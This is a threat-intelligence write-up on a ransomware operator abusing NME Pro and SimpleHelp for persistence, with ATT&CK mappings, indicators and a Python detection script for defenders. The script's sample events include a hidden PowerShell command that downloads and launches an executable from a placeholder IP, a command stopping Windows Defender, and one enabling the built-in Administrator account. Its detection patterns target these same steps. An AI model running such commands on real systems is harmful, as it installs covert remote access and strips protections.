Full Report
A member of the Crazy ransomware gang is abusing legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment. [...]
Analysis Summary
# Tool/Technique: Net Monitor for Employees Professional (NME Pro) & SimpleHelp
## Overview
Members of the Crazy ransomware gang are abusing legitimate employee monitoring software (Net Monitor for Employees Professional) and the SimpleHelp remote support tool to maintain persistence, evade detection, and prepare for ransomware deployment within corporate networks. These tools allow attackers to blend in with normal administrative activity.
## Technical Details
- Type: Tool (Legitimate Software Abused)
- Platform: Windows
- Capabilities: Remote desktop viewing, file transfer, system monitoring and activity logging, and command execution (interactive, and triggered automatically by monitoring rules).
- First Seen: Context implies ongoing activity around February 2026.
## MITRE ATT&CK Mapping
*Note: mappings describe the abuse of these legitimate tools, not the tools themselves.*
- TA0003 - Persistence
- T1543.003 - Create or Modify System Process: Windows Service (both agents are normally installed as a Windows service, which is how they survive reboots)
- TA0011 - Command and Control
- T1219 - Remote Access Software (SimpleHelp and NME Pro are the attackers' primary access channel)
- T1071.001 - Application Layer Protocol: Web Protocols (inferred; the report does not state the transport, but both tools commonly tunnel sessions over HTTP/HTTPS)
- TA0005 - Defense Evasion
- T1218.007 - System Binary Proxy Execution: Msiexec (NME Pro was installed via `msiexec.exe`)
- TA0008 - Lateral Movement
- T1021 - Remote Services (SimpleHelp/NME Pro provide the interactive remote access; the report does not detail how additional hosts were reached)
## Functionality
### Core Capabilities
* **Remote Access & Control:** Provided full interactive remote access to compromised systems via both NME Pro (desktop viewing, file transfer, command execution) and SimpleHelp.
* **Persistence:** SimpleHelp was installed via PowerShell commands, disguised with filenames like `vshost.exe` or placed in directories mimicking legitimate services (`C:\ProgramData\OneDriveSvc\OneDriveSvc.exe`), ensuring redundant access even if NME Pro was removed.
* **Execution:** Attackers utilized the monitoring software to remotely execute commands against systems.
### Advanced Features
* **Custom Monitoring/Staging:** Attackers configured monitoring rules within the SimpleHelp agent to specifically surveil activity related to cryptocurrency wallets (e.g., metamask, exodus, binance, kucoin) and other remote access tools (RDP, anydesk, teamview, VNC). This suggests preparation for potential cryptocurrency theft alongside ransomware deployment.
* **Defense Evasion:** Attackers attempted to disable Windows Defender by stopping and deleting associated services.
* **Account Manipulation:** Attempted to enable the built-in Administrator account with `net user administrator /active:yes`. This is a persistence step rather than an escalation in itself: the command already requires administrative rights, and what it buys is a second, well-known local account to log in with (ATT&CK T1098 / T1078.001).
## Indicators of Compromise
- File Hashes: N/A (Not provided in the text)
- File Names:
* SimpleHelp payload disguised as: `vshost.exe`
* SimpleHelp installation path disguised: `C:\ProgramData\OneDriveSvc\OneDriveSvc.exe`
- Registry Keys: N/A
- Network Indicators: Overlapping C2 infrastructure observed across incidents (details not specified/defanged).
- Behavioral Indicators:
* Installation of NME Pro via `msiexec.exe`.
* PowerShell used to download and install SimpleHelp.
* System process modifications related to disabling Windows Defender services.
* Monitoring agent rules that trigger and reset on keywords related to cryptocurrency wallets, exchanges, and other remote access tools.
## Associated Threat Actors
- Crazy ransomware gang (A single operator or group is strongly suggested across observed intrusions).
## Detection Methods
- Signature-based detection: Not explicitly mentioned for the abused tools themselves. Hash-based signatures on the dropped SimpleHelp binary have limited value: the hash changes with every vendor release and also matches authorised deployments of the same version. The disguised file name and path (`vshost.exe`, `C:\ProgramData\OneDriveSvc\`) are the more durable signature.
- Behavioral detection:
* Unauthorised installation of remote monitoring/support tools (e.g. `msiexec.exe` installing NME Pro, PowerShell downloading and launching SimpleHelp).
* Commands that stop or delete Windows Defender services, or that enable the built-in Administrator account.
* Legitimate remote access tools executing outside standard administrative change windows, or from paths that mimic other products.
- YARA rules: N/A
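The behavioural indicators above can be turned into simple process-creation rules. The following is an added example written for this summary, not code from the original report or from either tool vendor. It runs five rules over constructed events laid out like Sysmon Event ID 1 / Security 4688 records and correlates hits per host. Assumptions not taken from the report: the list of Defender service names, the set of "user-writable" path fragments, the ATT&CK sub-technique labels chosen per rule, the sample hostnames, and the documentation-range IP `203.0.113.10`.

```python
"""Added example: rule-based detection of the NME Pro / SimpleHelp abuse chain
over process-creation telemetry. Not code from the original report."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    cmdline: str


# Assumption: the report only says "associated services"; these are the real
# Windows Defender service/driver names that attackers typically target.
DEFENDER_SERVICES = {"windefend", "wdnissvc", "sense", "wdfilter", "wdboot", "wdnisdrv"}
# Assumption: path fragments treated as user-writable staging locations.
USER_WRITABLE = re.compile(r"(\\users\\|\\programdata\\|\\temp\\|\\public\\)", re.I)
DOWNLOAD_CMDLETS = re.compile(r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b)", re.I)
SVC_TAMPER = re.compile(r"\b(?:sc|net1?)(?:\.exe)?\s+(?:stop|delete|config)\s+\"?([\w\-]+)", re.I)
ENABLE_ADMIN = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+administrator\s+/active:yes", re.I)


def r_msiexec_user_path(e):
    """T1218.007: msiexec installing a package staged in a user-writable path (NME Pro was installed via msiexec)."""
    if not e.image.lower().endswith("\\msiexec.exe"):
        return None
    m = re.search(r"/(?:i|package)\s+\"?([^\"\s]+\.msi)", e.cmdline, re.I)
    if m and USER_WRITABLE.search(m.group(1)):
        return ("T1218.007", f"msiexec install from user-writable path: {m.group(1)}")
    return None


def r_ps_download(e):
    """T1105: PowerShell fetching an executable (the report: SimpleHelp downloaded and installed via PowerShell)."""
    if not e.image.lower().endswith("\\powershell.exe"):
        return None
    if DOWNLOAD_CMDLETS.search(e.cmdline) and re.search(r"\.(exe|msi)\b", e.cmdline, re.I):
        return ("T1105", "PowerShell download of an executable")
    return None


def r_disguised_rat(e):
    """T1036.005: binary named or placed to mimic a legitimate product. Note the caveat:
    Visual Studio's hosting process is <app>.vshost.exe inside a build directory, so only a
    bare vshost.exe (and anything under ProgramData\\OneDriveSvc) is treated as the disguise."""
    img = e.image.lower()
    if img.endswith("\\vshost.exe") or "\\programdata\\onedrivesvc\\" in img:
        return ("T1036.005", f"disguised remote-support binary: {e.image}")
    return None


def r_defender_tamper(e):
    """T1562.001: stopping/deleting/reconfiguring a Windows Defender service."""
    m = SVC_TAMPER.search(e.cmdline)
    if m and m.group(1).lower() in DEFENDER_SERVICES:
        return ("T1562.001", f"Defender service tampering: {m.group(0)}")
    return None


def r_enable_admin(e):
    """T1098: enabling the built-in Administrator account (a second login path, not an escalation)."""
    if ENABLE_ADMIN.search(e.cmdline):
        return ("T1098", "built-in Administrator account enabled")
    return None


RULES = (r_msiexec_user_path, r_ps_download, r_disguised_rat, r_defender_tamper, r_enable_admin)


def detect(events, threshold=3):
    """Return (hits, flagged_hosts): every rule hit as (host, technique, reason), and the
    hosts on which at least `threshold` distinct techniques fired, i.e. the full chain."""
    hits, per_host = [], defaultdict(set)
    for e in events:
        for rule in RULES:
            res = rule(e)
            if res:
                hits.append((e.host, res[0], res[1]))
                per_host[e.host].add(res[0])
    flagged = sorted(h for h, techs in per_host.items() if len(techs) >= threshold)
    return hits, flagged


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RAT = r"C:\ProgramData\OneDriveSvc\OneDriveSvc.exe"
SAMPLE_EVENTS = [  # constructed for this example; WS01 is the intrusion, WS02 is benign noise
    ProcEvent("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\jdoe\Downloads\nmepro.msi" /qn'),
    ProcEvent("WS01", r"C:\Windows\System32\cmd.exe", PS,
              r'powershell -w hidden -ep bypass -c "iwr http://203.0.113.10/vshost.exe -OutFile ' + RAT + '; Start-Process ' + RAT + '"'),
    ProcEvent("WS01", PS, RAT, RAT),
    ProcEvent("WS01", RAT, r"C:\Windows\System32\sc.exe", "sc stop WinDefend"),
    ProcEvent("WS01", RAT, r"C:\Windows\System32\net.exe", "net user administrator /active:yes"),
    ProcEvent("WS02", r"C:\Windows\explorer.exe", r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe", "OneDrive.exe /background"),
    ProcEvent("WS02", r"C:\Windows\CCM\CcmExec.exe", r"C:\Windows\System32\msiexec.exe", r'msiexec.exe /i "\\sccm01\pkgs\7zip.msi" /qn'),
    ProcEvent("WS02", r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              r"C:\src\app\bin\Debug\app.vshost.exe", "app.vshost.exe"),
]

if __name__ == "__main__":
    hits, flagged = detect(SAMPLE_EVENTS)
    for h in hits:
        print(*h)
    print("hosts with full chain:", flagged)
```

The per-host threshold is the part worth keeping even if the individual rules are tuned away: a single `msiexec` from Downloads or one `net user` command is routine on many estates, but three or more of these techniques on one host within the same window is the pattern the report describes and is worth paging on.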
## Mitigation Strategies
* Organizations must closely monitor for unauthorized installations of remote monitoring and support tools like NME Pro and SimpleHelp.
* Enforce Multi-Factor Authentication (MFA) on all remote access services, particularly SSL VPNs, as initial breaches occurred via compromised credentials for these services.
* Review `msiexec.exe` and PowerShell executions that download or install administrative software, and alert when they originate outside approved deployment tooling or from user-writable paths.
## Related Tools/Techniques
- SimpleHelp (already abused by DragonForce ransomware group in MSP supply chain attacks).
- General abuse of legitimate remote management and monitoring tools (RMMs) in ransomware operations.